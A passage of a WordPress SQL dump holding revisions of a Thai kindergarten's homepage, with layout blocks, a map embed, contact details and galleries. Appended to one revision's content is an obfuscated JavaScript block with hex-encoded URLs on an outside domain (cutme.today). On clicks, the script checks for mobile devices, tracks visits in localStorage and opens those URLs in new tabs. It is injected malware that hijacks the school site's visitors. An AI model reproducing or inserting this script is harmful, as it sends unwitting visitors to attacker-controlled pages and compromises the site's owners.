\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:18:02','2024-07-27 14:18:02','',19,'http://watprato.ssk.in.th/?p=66',0,'revision','',0),
(69,1,'2024-07-27 21:21:55','2024-07-27 14:21:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" 